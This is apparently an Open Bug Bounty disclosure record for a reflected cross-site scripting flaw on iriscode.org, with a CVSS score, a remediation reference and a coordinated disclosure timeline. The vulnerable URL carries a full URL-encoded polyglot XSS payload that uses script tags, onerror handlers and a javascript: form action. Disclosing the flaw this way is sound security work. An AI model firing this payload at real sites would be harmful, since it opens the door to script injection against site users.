iriscode.org XSS vulnerability

2017-12-31T02:45:00
ID OBB:470260
Type openbugbounty
Reporter WebDiamond7
Modified 2018-03-31T02:45:00

Description

Open Bug Bounty ID: OBB-470260

Description| Value
---|---
Affected Website:| iriscode.org
Vulnerable Application:| Custom Code
Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79
CVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N]
Remediation Guide:| OWASP XSS Prevention Cheat Sheet

Vulnerable URL:
http://www.iriscode.org/main.php?&Lg;=%22%3E%3E%3Cmarquee%3E%3Cimg%20src%3Dx%20onerror%3Dconfirm(1)%3E%3C%2Fmarquee%3E%22%20%3E%3C%2Fplaintext%5C%3E%3C%2F%7C%5C%3E%3Cplaintext%2Fonmouseover%3Dprompt(1)%20%3E%3Cscript%3Eprompt(1)%3C%2Fscript%3E%40gmail.com%3Cisindex%20formaction%3Djavascript%3Aalert(%2FXSS%2F)%20type%3Dsubmit%3E%27--%3E%22%20%3E%3C%2Fscript%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E%22%3E%3Cimg%2Fid%3D%22confirm%26lpar%3B%201)%22%2Falt%3D%22%2F%22src%3D%22%2F%22onerror%3Deval(id%26%2523x29%3B%3E%27%22%3E%3Cimg%20src%3D%22http%3A%20%2F%2Fi.imgur.com%2FP8mL8.jpg%22%3E%20%EF%BF%BC%EF%BF%BC
Coordinated Disclosure Timeline

Description| Value
---|---
Vulnerability Reported:| 31 December, 2017 02:45 GMT
Vulnerability Verified:| 31 December, 2017 02:47 GMT
Website Operator Notified:| 31 December, 2017 02:47 GMT
Vulnerability Published:| 31 December, 2017 02:47 GMT[without any technical details]
Public Disclosure:| 31 March, 2018 02:45 GMT